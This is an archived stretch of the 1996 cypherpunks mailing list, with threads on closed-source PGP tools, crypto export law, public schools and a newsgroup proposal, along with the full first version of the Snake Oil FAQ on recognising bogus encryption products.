-- | ===================================================================:) From unicorn at schloss.li Fri Sep 27 20:17:56 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 28 Sep 1996 11:17:56 +0800 Subject: LivePGP (fwd) In-Reply-To: <199609271533.KAA08175@homeport.org> Message-ID: On Fri, 27 Sep 1996, Adam Shostack wrote: > ----- Edited message from Ming-Ching Tiew ----- > > >From mctiew at csi.po.my Thu Sep 26 22:36:39 1996 > Message-ID: <01BBAC57.C7351E60 at minuet> > From: Ming-Ching Tiew > To: "'Adam Shostack'" > Subject: RE: LivePGP > Date: Fri, 27 Sep 1996 09:39:21 +-800 > Encoding: 38 TEXT > > > > Do you already have this information ? > > http://www.vv.com.au/vv/resources/security/livepgp/README.html > > The copy is expiring soon. I will soon be releasing a new copy which is > much for polished. > > I am not releasing the source. Then I am not using the software. > > > ----- End of forwarded message from Ming-Ching Tiew ----- > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From craigw at dg.ce.com.au Fri Sep 27 20:18:32 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Sat, 28 Sep 1996 11:18:32 +0800 Subject: VCRS and Crypto Message-ID: <199609280123.LAA15458@mac.ce.com.au> If the average person cared about quality rather than what is marketed as best and the must have, we might have laser disk instead of video rental stores. Also, where would M$ be > >Remember the VHS/Beta VCR wars? With a fairly equal market in about 1978, > >Beta died 10 years later because the market couldn't support two > >incompatible standards. It wasn't that one was dramatically better than the > >other, it was simply that having two standards forced the market to > >duplicate stocks, for the machines as well as tapes, particularly > >pre-recorded tapes. 
Notice, however, that VCR's are relatively "isolated": > >It doesn't really matter if you have one format and your neighbor has > >another, unless you want to swap tapes. But crypto telephones inherently > >require (in the long term) full intercompatibility. If you didn't have that, > >there'd be half a world of people you couldn't call! > Soon, we may all be staring at our computers, wondering whether they're staring back. [Network Admin For WPA Business Products. aka doshai >;-) ] http://pip.com.au/~doshai/ Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dthorn at gte.net Fri Sep 27 20:22:31 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 28 Sep 1996 11:22:31 +0800 Subject: Public Schools In-Reply-To: Message-ID: <324C7C95.3A79@gte.net> Timothy C. May wrote: > At 9:22 AM -0400 9/27/96, ronsimpson wrote: > >I hate to burst any bubbles but, the school with the highest number > >of National Merit Finalists and highest number of 1600 SATs is a > >Public High School (Jefferson High in Fairfax, VA) > I took some of my science classes at Jefferson. > Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS. > Help me before it's too late. > (Seriously, my view is that schools are not very important. All > success, academic or technical, derives from one basic determining > factor: those who read for pleasure, succeed, and those who don't read > for pleasure, don't. The young child who reads will usually keep > reading, whether novels, encyclopedias, lists like this, etc. The > child who is not into reading will likely never get into it later in > life. 
Which is OK, as there is a serious > shortage of tradesmen, at least in my area, and more kids ought to be > taught usable trades. Seriously. Our "ideal" that all children should > attend college is absurd, given the lack of academic preparation, > desire, and reading skills that so many high school students lack. > Most community > colleges are essentially becoming Grades 13-14, with most of the Grade > 13-14 students reading at the 9th-grade level (which most of us on > this list were reading at when we were in the 7th-grade, or earlier).) On the "ideal that all children should attend college": I grew up in Ohio and went to school in the 1950's. College was a luxury, or necessary only for professional jobs (doctor, etc). There was no Ohio income tax, and no state lottery, both of which were instituted (in the 1970's) at least partly on the premise of helping schools. I don't have to elaborate on where the money went, right? But, if you are suggesting seriously that one of the greatest money scams of all time, which involves not only moving pay-for-school to the masses (i.e., requiring college for nearly everyone), but makes indentured servants out of most of the people who get a serious degree, well, you're up against the big bucks on that one. From dlv at bwalk.dm.com Fri Sep 27 20:35:24 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 28 Sep 1996 11:35:24 +0800 Subject: Possible subs attack???? In-Reply-To: <843834821.2722.0@fatmans.demon.co.uk> Message-ID: The lying sack of shit Timmy May writes: > > whose list is this, and why am I on it? Please delete my name > > now. > > I have noticed a lot of these messages on the list over the last day > or two, I can only assume Vilus/Detweiller/Some other troublemaker > has decided to subscribe a few people using fake return addresses, > anyone else got any ideas on what else could have caused people to be > subscribed? The lying sack of shit Timmy May lies again, as usual. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Fri Sep 27 20:39:20 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 28 Sep 1996 11:39:20 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: At 5:43 PM -0400 9/27/96, Black Unicorn wrote: >On Thu, 26 Sep 1996, Timothy C. May wrote: >His admission that he used the notebook. Recovering the notebook and >finding the software. Interviewing the Customs agent working at the time. His admission that he used _which_ notebook? Chain of evidence again. Finding _which_ software? (As for the Customs agent, I can assure you that my luggage has never been checked upon either leaving the U.S. or entering the U.S. Even if U.S. Customs could figure out who was working at the time I putatively entered the country, and even if he remembered _me_, months later, just what records would he have, and how would they stand up in court?) Hearing me say I "exported crypto," a hearsay claim, and happening to find one or more laptops at my home, weeks or months later, implies nothing. (To make the point graphically, suppose the raiding party finds _several_ laptops or notebooks...do they assume _all_ were taken out of the country, or do they pick the one with the most incriminating software on it? Answer: Unless they can _prove_ one of them was used, and that it had not been _changed_ since the putative event (highly unlikely), they cannot simply _assume_ one of them was taken out. (Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not the one I took to Europe." "Oh, you say this laptop has PGP 5.9 on it? So? I installed it last week. My trip to Europe was last summer.") >Considering the headaches required for airline travel today, it's not like >there aren't serious records abound. Such as? 
I recall no inspections of my luggage, no inventorying of the serial numbers of my laptops, no inspection whatsoever of my magneto-optical drives (which were in my carry-on luggage, and not even glanced at, in the box they were in). X-rays would not prove what was taken in or out of the country, even if "x-ray escrow" were implemented (which it is not, according to all reports I have heard, and based on some practical limits on storage), I doubt the records of a trip, say, last summer (of '95) could be retrieved and prove that a particular laptop was taken out. Not to mention that the software allegedly taken out might have been on any kind of media, none of them distinguishable with an x-ray machine. >For crying outloud, he admitted to the world that he took the software >out. I put that in front of a jury and it looks just like the typical "For crying out loud" is bluster, not legal argument. >stupid bragging criminal. Any defense about "I was just kidding" or "The >message was forged" might be interesting, but it will sound like >technical-mumbo-jumbo to a jury. Yes, it would convince >ME< that was a Legal proof is still needed. Given only a nebulous statement like "I exported crypto in violation of the ITARs," or "I shipped PGP to Europe," is not enough for a case even to be brought to trial. (If it reached trial, I would expect a defense attorney to move for dismissal. Absent any evidence that a crime occurred, absent any proof beyond the nebulous hearsay statement of a "braggart," there is simply no basis for criminal action.) "Stupid bragging criminals" may be common, but bragging is not in and of itself illegal. There still has to be evidence of a crime. "Produce the body." (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the body, or witnesses, does this mean I'll be found guilty? To use BU's phrasing, "for crying out loud.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. 
---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From snow at smoke.suba.com Fri Sep 27 21:03:09 1996 From: snow at smoke.suba.com (snow) Date: Sat, 28 Sep 1996 12:03:09 +0800 Subject: Public Schools In-Reply-To: <9608278438.AA843856542@smtplink.alis.ca> Message-ID: <199609280109.UAA00349@smoke.suba.com> James said: > ronsimpson at unidial.com wrote: > >I hate to burst any bubbles but, the school with the highest number > > of National Merit Finalists and highest number of 1600 SATs is a > > Public High School (Jefferson High in Fairfax, VA) > The same is true for Montreal (Royal Vale) using the equivalent scoring methods. > But there are public schools at both extremes of the curve. > While it is true that Private Schools would not survive due to market forces if > they did consistently poorly, it is also true that they filter their incoming > student body in a manner that Public Schools can not. > If you want to refuse those who are too stupid or anti-social from Public > Schools in order to improve the social or intellectual climate, you better have > a solution for the resulting cast-offs. There is a solution. Trade Schools, and Parental Involvement. It could very well be (and if I had the money I'd make the bet) that _many_ of the "troubled" youth of today are simply undisciplined. (Fortunately, most of them couldn't afford to bet against their parents in an AP world). It would also seem to follow that if parents were spending their own money (or perceived it as their own money) that they would take a greater interest in their children's education.
For those that are truly not scholastically oriented, there would be trade schools. I would also bet that you could teach a child everything they need to learn (other than a trade) to cope in this world in about 4 years. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From cmcurtin at research.megasoft.com Fri Sep 27 21:06:23 1996 From: cmcurtin at research.megasoft.com (C Matthew Curtin) Date: Sat, 28 Sep 1996 12:06:23 +0800 Subject: Snake Oil FAQ 1.0 Message-ID: <199609272313.TAA00656@goffette.research.megasoft.com> Obviously, there's still work to be done, but that's why there are numbers higher than 1.0, right? :-) -matt URL: http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html Version: 1.0 Archive-name: cryptography-faq/snake-oil Posting-Frequency: monthly Snake-Oil Warning Signs Encryption Software to Avoid Copyright © 1996 Matt Curtin $Id: snake-oil-faq.html,v 1.0 1996/09/27 21:15:04 cmcurtin Exp $ Distribution Distribution of this document is unlimited. We're specifically interested in reaching people making decisions about what sorts of crypto to use (if any at all), both for their organizations and for themselves, especially those who are non-experts in the field of cryptography and security. This is a work-in-progress. Feedback is greatly appreciated. The Snake Oil FAQ is posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, comp.answers, and comp.infosystems. Disclaimer All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves. This is a compilation of things that are common among snake oil vendors. It cannot be the sole metric by which a security product is rated, since there can be exceptions to most (or all?) of these rules. (But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil.
From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some braindead marketing technique, so be aware that exceptions to general rules can exist.) Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, Matt Curtin History With the rise in the number of crypto products becoming available came a rise in the amount of ineffective or outright bogus products. After some discussion about this on the cypherpunks list, Robert Rothenburg wrote the first iteration of the Snake Oil FAQ. Matt Curtin took the early text and munged it into its current state with the help of the listed contributors (and probably some others whose names have inadvertently been missed. Sorry in advance, if this is the case.) Introduction This really isn't much of a "FAQ" in the sense that one generally expects to see them: in a question and answer format. Perhaps it will be rewritten as such in the future, but currently, it is a more traditionally-formatted paper that covers many topics that are the subject of frequently asked questions. Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail to do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security. Why "snake oil?" The term is used in many fields to denote something that is sold without consideration of its quality, or its ability to live up to claims made by its vendor.
This term originally applied to that sold in traveling medicine shows, where the salesmen would claim their elixir would cure just about any ailment that a potential customer could have. Listening to some of the claims made by some modern day crypto vendors, "snake oil" is a surprisingly apt name. Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is to present some obvious "red flags" that people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing. For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil". When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that supports strong encryption? An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? Is the third party someone's kid sister? An individual? A corporation? A government? Beware of products that are designed for a specific task (such as data archiving, for example), and add encryption in as an additional feature. Typically, it's better to use an encryption utility for encryption, rather than some tool designed for another purpose that adds encryption to its list of features. Some basics The cryptography-faq (found at http://www.cis.ohio-state.edu/hypertext/faq/usenet/cryptography-faq/top.html) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below. Conventional vs.
Public Key Cryptography There are two basic types of cryptosystems: symmetric (also known as "conventional," sometimes also called "secret key") and asymmetric ("public key.") Symmetric ciphers require both the sender and the recipient to have the same key. That key is applied to encrypt the data by the sender, and again by the recipient to decrypt the data. The problem here is getting the sender and recipient to share the key. Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets (and verifies!) Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses his private key to decrypt the message. Secrecy vs Integrity: What are you trying to protect? For many users of computer based crypto, preserving the contents of a message is as important as protecting its secrecy. Damage caused by a modified message can often be worse than that caused by its disclosure. For example, it may be disquieting to discover that a hacker has read the contents of your funds transfer authorization, but it's a disaster for him to change the transfer destination to his own account. Encryption by itself does not protect a message from change. In fact, there are several techniques for changing the contents of an encrypted message without ever figuring out the encryption key. If the integrity of your messages is important, don't just rely on secrecy to protect them. Check the vendor's claims for an explanation of how their product protects the message from undetected modification. The verification of public keys is an important step.
Failure to verify Bob's public key leaves open the possibility that Alice is sending her secrets to someone else, who simply claims to be Bob, using a key that has Bob's name on it, but whose associated private key is in the hands of an attacker. Asymmetric ciphers are much slower than their symmetric counterparts. Also, key sizes must be much larger. See the cryptography FAQ for a more detailed discussion of these topics. Key Sizes Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small key sizes and increasing processor speeds (making brute-force attacks - trying every possible key - feasible). The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one. Having stated the above, it is important to note that a common feature of snake oil is to have large keys. Often, the claimed key lengths are much longer than what is practical, usually due to the vendor's confusion between symmetric and asymmetric cipher key length requirements. (For example, a vendor who claims to use a strong symmetric cipher with a 2048 bit key is probably lacking some basic understanding of key length requirements, and requisite computing power for performing various functions with the keys in question.) In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay. This is included so the reader will be able to get a reasonable idea of symmetric key length requirements, and have some sort of a guideline for determining whether the key length of the product he's interested in even makes sense.)
The following chart appears in [1].

Security Requirements for Different Information

Type of Traffic                                  Lifetime        Minimum [Symmetric] Key Length
Tactical military information                    minutes/hours   56-64 bits
Product announcements, mergers, interest rates   days/weeks      64 bits
Long-term business plans                         years           64 bits
Trade secrets (e.g., recipe for Coca-Cola)       decades         112 bits
H-bomb secrets                                   >40 years       128 bits
Identities of spies                              >50 years       128 bits
Personal affairs                                 >50 years       128 bits
Diplomatic embarrassments                        >65 years       at least 128 bits
U.S. Census data                                 100 years       at least 128 bits

As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from [1]. (Due to differences between symmetric and asymmetric algorithms, key length comparisons between the two are difficult. The following is intended to give the reader just a general idea of what is roughly comparable, in order to be able to weed out claims of security of, for example, ciphers with 100-bit asymmetric keys.)

Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks*

Symmetric Key Length    Public-key Key Length
56 bits                 384 bits
64 bits                 512 bits
80 bits                 768 bits
112 bits                1792 bits
128 bits                2304 bits

*These key sizes are for public key cryptosystems based on the problem of factoring large integers, and apply to a number of ciphers based on the discrete log problem (difficulty of taking logarithms in a finite field.) A variation of the discrete log problem (known as Elliptic Curve Discrete Logarithm Problem), where the cryptosystem is based on computations on points of an elliptic curve over a finite field, for example, has been shown to be resistant to brute-force attacks with much smaller keys than other discrete log problem-based ciphers. Ciphers based on different problems have different key size requirements.
Each type of algorithm's key size requirements depend on the mathematical problem on which the system is based. So, it's important to find out what algorithm (or at least mathematical problem the algorithm uses) and key size is used. One without the other is meaningless. Implementation Environment Other factors that can influence the relative security of a product are related to its environment. For example, in software-based encryption packages, is there any plaintext that's written to disk (perhaps in temporary files)? What about operating systems that have the ability to swap processes out of memory on to disk? When something to be encrypted has its plaintext counterpart deleted, is the extent of its deletion a standard removal of its name from the directory contents, or has it been written over? If it's been written over, how well has it been written over? Is that level of security an issue for you? Are you storing cryptographic keys on a multi-user machine? The likelihood of having your keys illicitly accessed is much higher, if so. It's important to consider such things when trying to decide how secure something you implement is (or isn't) going to be. Some Common Snake-Oil Warning Signs The following are some of the "red flags" one should watch for when examining an encryption product * Technobabble The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either. A sign of technobabble is a description which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in literature about cryptology. 
Further, if the marketing material isn't clear, what reason is there to believe that the instructions are any better? Even the greatest of products, if not used properly, can be rendered useless. If you can't understand what a vendor is saying, you're most likely better off finding something that makes more sense. * New Type of Cryptography? Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new breakthroughs" are likely to show up in the research literature, and professionals in the field typically won't trust them until after years of analysis, by which time they are not so new anymore. Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses a different method of computation doesn't make it more secure. (As a matter of fact, these techniques are the subject of ongoing cryptographic research and nobody has published successful results based on their use yet.) Anything whose authors claim to have invented a new public key cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography is grounded in mathematical theory. The security is based on problems that are known (or widely believed) to be hard to solve. It's important to understand the difference between a new algorithm or cipher and a new product. Engaging in the practice of developing ciphers and cryptographic products is a fine thing to do. However, to do both, at the same time, is foolish. Many snake oil vendors brag about how they do this, despite the lack of wisdom in such activity. The strength of any encryption scheme is only proven by the test of time. New crypto is like new pharmaceuticals, not new cars. In some ways, though, it's worse: if some pharmaceutical company has some bogus stuff out there, people will start getting really sick.
If you're using bogus crypto, you likely won't have any idea that your secrets aren't as secret as you think. * Secret Algorithms Avoid software which uses secret algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the academic and professional crypto community, then you should be wary of trusting it. (Note that a vendor who specializes in cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception. On the other hand, if you don't know which vendors are and aren't reputable, you can't take their words for it. You're typically best off avoiding that which is secret.) Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher. The use of a trusted algorithm, with technical notes explaining the implementation (or better yet, availability of the source code for the product itself) are signs that a vendor is confident about their product's security. You can take the implementation apart and test it yourself. A lock where attackers can see the internal mechanisms, and still not be able to break it is a strong lock, indeed. A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access to your system, access to encrypted data might be the least of your problems.)
* Experienced Security Experts and Rave Reviews Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal). Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) to take the software apart for them. Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either. * Unbreakability Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims. (If it sounds too good to be true, it probably is.) No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power. One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion. Some companies that claim "unbreakability" actually have serious reasons for saying so. Unfortunately, these reasons will generally turn out to depend on some narrow definition of what it means to "break" their security. For example, true one time pads are technically "unbreakable" as far as secrecy goes, but only if several difficult and important conditions also hold. Even then, they are trivially vulnerable to known plaintext attacks on the message's integrity. Other systems may be "unbreakable" only until one of the communicating devices (a laptop, for example) is stolen. So, be sure to find out exactly what the "unbreakable" properties of the system are, and decide if the more breakable portions also provide adequate security. 
Often, less experienced vendor representatives will roll their eyes and say, "Of course it's not unbreakable if you do such-and-such." The point is that the exact nature of "such and such" will vary from one product to another. Pick the one that matches your operational needs the best. * One-Time-Pads A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. (Technically, OTP-generated ciphertext has an equal chance of being each possible plaintext. For example, "598v *$ _+~xCtMB0" has equal probabilities of decrypting to "the whole year in", "the hole youre in", and "you are a weenie!") Snake-oil sellers will try to capitalize on the known strength of an OTP. It is important to understand that any variation in the implementation (which is often done to get around the inherent key management problems of OTPs) means that it is not an OTP, and has nowhere near the security of an OTP. An OTP system is not an algorithm. It works by having a "pad" (called such because originally paper pads were used, before general-purpose computers came into being) of random bits in the possession of both the sender and recipient, but absolutely no one else. (The pad must be sent from one to the other securely, such as in a locked briefcase handcuffed to the carrier, and that sort of thing.) The message is encrypted using the next n bits in the pad as the key, where n is the number of bits in the message. After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad. Further, if the keys (i.e., random bit "pads") are provided by the vendor, the quality of these cannot be verified. How do you know that they aren't sending the same bits (or some trivial mutation thereof) to everyone?
Or keeping a copy for themselves? Or selling a copy to your competitors or enemies? OTPs are highly impractical for general purpose cryptography, since the need for random bits is very high, and key management is so cumbersome. OTPs are only practical for extremely low bandwidth communication channels where two parties have the means to exchange pads through a different method from that of their messages. (It is rumored that a link from Washington, D.C., to Moscow was (is?) encrypted with an OTP.) A lesson from the VENONA project (see NSA's web site) is that OTPs are seriously vulnerable if a pad is ever reused. It does not take the resources of a government agency to crack a reused pad. Therefore, the real limitation to their practical use is the generation and distribution of truly random keys for them. You have to distribute at least one bit of key for every bit of data transmitted, including any encrypted protocol data that's sent. If you reuse your pads you run the risk of compromising all data sent with the reused pad. The vendor might (or might try to) confuse random session keys or initialization vectors with OTPs. * Algorithm or product XXX is insecure Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these. These usually involve either trying every possible combination of bits to form keys, and trying every possible key until a solution is found, factoring large numbers, or some other cryptanalysis that's just as computationally intensive as one of these methods. * Keys and Passwords The "key" and the "password" are not the same thing.
The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization"). The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. If the system limits the size of the key or passphrase to something that seems too low, it probably is. If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it. If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product. Convenience is nice, but be wary of anything that puts too much emphasis on ease of use, without due consideration to cryptographic strength. Avoid anything that lets anyone with your copy of the software access files, data, etc. without having to use some sort of key or passphrase. Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy). Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and secret-key (symmetric) cryptography. * Lost keys and passwords If the vendor (or a third party) claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it: a flaw is obviously present, and used to retrieve the contents of an encrypted message. If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key?
(Is someone else able to recover your key as easily as you can?) Remember, you have no security against someone who has your key. * Exportable from the USA If the software is made in the US, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export). If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art. (For example, if someone claims that the IDEA cipher is exportable from the US, while most other vendors (or the State Department!) do not make such assertions, they're probably lacking sufficient clue to provide you with strong cryptographic software.) Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution. (Of course, a freely exportable version isn't secure, since it probably just uses a much smaller key, one that could be easily broken.) Also note that just because software has made it outside of the US does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site. There are no restrictions on importing crypto products into the US, so a foreign vendor can legally offer a single, secure version of a product for the entire world. * "Military Grade" Encryption Many crypto vendors claim their solution is "military grade." This is a term with no real meaning, since there isn't a real metric by which something can be judged "military grade," except for it to be actually used by various armed forces. Since they don't reveal what they're using, it's neither possible to prove nor to disprove something as being "military grade." 
Some good crypto products unfortunately also use this term. (Watch for this one especially in combination with other snake oil indicators, i.e., "our military grade encryption system is exportable from the US!") Other Considerations Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use). No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary of any product that claims it is. Glossary algorithm A procedure or mathematical formula. Cryptographic algorithms convert plaintext to and from ciphertext. cipher Synonym for "cryptographic algorithm" cryptanalysis To solve or "break" a cryptosystem. escrow A third party able to decrypt messages sent from one person to another. Although this term is often used in connection with the US Government's "Clipper" proposals, it isn't limited to government-mandated ability to access encrypted information at will. Some corporations might wish to have their employees use cryptosystems with escrow features when conducting the company's business, so the information can be retrieved should the employee be unable to unlock it himself later, (if he were to forget his passphrase, suddenly quit, get run over by a bus, etc.) Or, someone might wish his spouse or lawyer to be able to recover encrypted data, etc., in which case he could use a cryptosystem with an escrow feature. initialization vector One of the problems with encrypting such things as files in specific formats (i.e., that of a word processor, email, etc.) is that there is a high degree of predictability about the first bytes of the message. This could be used to break the encrypted message easier than by brute force.
In ciphers where one block of data is used to influence the ciphertext of the next (such as CBC), a random block of data is encrypted and used as the first block of the encrypted message, resulting in a less predictable ciphertext message. This random block is known as the initialization vector. The decryption process also performs the function of removing the first block, resulting in the original plaintext. ITAR International Traffic in Arms Regulations. These are the rules by which munitions (including cryptography), as defined by the US State Department, may (or may not) be exported from the US. key A piece of data that, when fed to an algorithm along with ciphertext, will yield plaintext. (Or, when fed to an algorithm along with plaintext, will yield ciphertext.) random session key This is a temporary key that is generated specifically for one message. Typically, in public key cryptosystems, the message to be sent is encrypted with a symmetric key that was specifically generated for that message. The encrypted version of that message, as well as the associated session key can then be encrypted with the recipient's public key. When the recipient decrypts the message, then, the system will actually decrypt the message it gets (which is the ciphertext message and the symmetric key to decrypt it), and then use the symmetric key to decrypt the ciphertext. The result is the plaintext message. This is often done because of the tremendous difference in the speed of symmetric vs. asymmetric ciphers. Contributors The following folks have contributed to this FAQ. Jeremey Barrett Gary Ellison Larry Kilgallen Dutra Lacerda Jim Ray Terry Ritter Robert Rothenburg Adam Shostack Rick Smith Randall Williams Jim Ray References 1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996 2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M.
Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available from ftp://ftp.research.att.com/dist/mab/keylength.ps -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From dsmith at prairienet.org Fri Sep 27 22:32:49 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sat, 28 Sep 1996 13:32:49 +0800 Subject: Newsgroup proposal: misc.anonymous Message-ID: <199609280340.WAA00327@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Fri Sep 27 22:31:58 1996 remailer at cypherpunks.ca blathered thusly... > This sounds like a good idea. I would certainly vote for such a news > group. Should the name be misc.anonymous or misc.anonymous.messages? > Are alt.anonymous and alt.anonymous.messages basically to different > newsgroups for exactly the same purpose, or is there some difference > between them. I believe that a.a is for discussion, and a.a.m is the "message pool." dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." 
